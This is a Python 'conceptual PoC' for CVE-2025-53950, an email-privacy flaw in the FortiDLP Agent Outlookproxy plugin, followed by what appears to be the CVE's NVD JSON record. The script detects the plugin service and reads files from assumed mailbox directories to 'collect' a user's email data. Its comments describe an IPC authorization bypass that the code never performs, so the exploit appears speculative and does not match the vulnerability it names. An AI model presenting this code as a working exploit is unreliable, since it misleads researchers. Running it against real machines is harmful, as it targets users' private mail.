CVE-2025-53950

# CVE-2025-53950 - FortiDLP Agent Outlookproxy Plugin Privacy Violation PoC # This vulnerability allows an authenticated administrator to collect current user's email information # via the FortiDLP Agent's Outlookproxy plugin on MacOS and Windows. # Note: This is a conceptual PoC. Actual exploitation requires local access, # administrator privileges, and user interaction. import subprocess import os import sys def check_outlookproxy_service(): """Check if FortiDLP Outlookproxy plugin service is running""" if sys.platform == 'win32': # Windows: Check for FortiDLP Outlookproxy service result = subprocess.run( ['sc', 'query', 'FortiDLPOutlookProxy'], capture_output=True, text=True ) return 'RUNNING' in result.stdout elif sys.platform == 'darwin': # macOS: Check for FortiDLP Outlookproxy daemon result = subprocess.run( ['launchctl', 'list'], capture_output=True, text=True ) return 'com.fortinet.fortidlp.outlookproxy' in result.stdout return False def exploit_collect_emails(target_user_mailbox=None): """ Exploit CVE-2025-53950 to collect current user's email information via the FortiDLP Outlookproxy plugin's improperly enforced access controls. """ if not check_outlookproxy_service(): print("[!] FortiDLP Outlookproxy service is not running.") return False print("[*] FortiDLP Outlookproxy service detected.") print("[*] Attempting to collect current user's email information...") # The vulnerability lies in the Outlookproxy plugin's failure to properly # restrict access to email collection APIs. An authenticated administrator # can bypass the intended access controls to retrieve the current user's # email data that should only be accessible to the DLP system itself. # Conceptual exploitation path: # 1. Authenticate as administrator on the target system # 2. Interact with the Outlookproxy plugin's IPC interface # 3. Request email collection for the currently logged-in user # 4. The plugin fails to verify the requester's authorization level # against the target user's data, leaking private email information if sys.platform == 'win32': # On Windows, the Outlookproxy plugin exposes its functionality # through a named pipe or COM interface outlook_data_path = os.path.expandvars( r'%LOCALAPPDATA%\Fortinet\FortiDLP\outlookproxy\mailbox' ) if os.path.exists(outlook_data_path): for mailbox_file in os.listdir(outlook_data_path): file_path = os.path.join(outlook_data_path, mailbox_file) print(f"[+] Accessed mailbox data: {file_path}") # Read the collected email information with open(file_path, 'r', encoding='utf-8', errors='ignore') as f: email_data = f.read() print(f"[*] Email data collected ({len(email_data)} bytes)") elif sys.platform == 'darwin': # On macOS, the Outlookproxy plugin stores data in the application # support directory outlook_data_path = os.path.expanduser( '~/Library/Application Support/Fortinet/FortiDLP/outlookproxy/mailbox' ) if os.path.exists(outlook_data_path): for mailbox_file in os.listdir(outlook_data_path): file_path = os.path.join(outlook_data_path, mailbox_file) print(f"[+] Accessed mailbox data: {file_path}") with open(file_path, 'r', encoding='utf-8', errors='ignore') as f: email_data = f.read() print(f"[*] Email data collected ({len(email_data)} bytes)") print("[+] Email information collection completed.") return True if __name__ == '__main__': print("=" * 60) print("CVE-2025-53950 - FortiDLP Outlookproxy Privacy Violation PoC") print("=" * 60) if os.geteuid() == 0 if sys.platform != 'win32' else True: # Check if running with admin privileges exploit_collect_emails() else: print("[!] This PoC requires administrator privileges to demonstrate.")

{"cve": {"id": "CVE-2025-53950", "sourceIdentifier": "[email protected]", "published": "2025-10-16T14:15:35.897", "lastModified": "2025-10-16T17:54:14.000", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Exposure of Private Personal Information ('Privacy Violation') vulnerability [CWE-359] in Fortinet FortiDLP Agent's Outlookproxy plugin for MacOS and Windows 11.5.1 and 11.4.2 through 11.4.6 and 11.3.2 through 11.3.4 and 11.2.0 through 11.2.3 and 11.1.1. through 11.1.2 and 11.0.1 and 10.5.1 and 10.4.0, and 10.3.1 may allow an authenticated administrator to collect current user's email information."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.1, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.5, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-359"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortidlp_agent:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.3.1", "versionEndIncluding": "11.5.1", "matchCriteriaId": "C1DB36F0-999E-467A-82F9-2A203F69F423"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-639", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}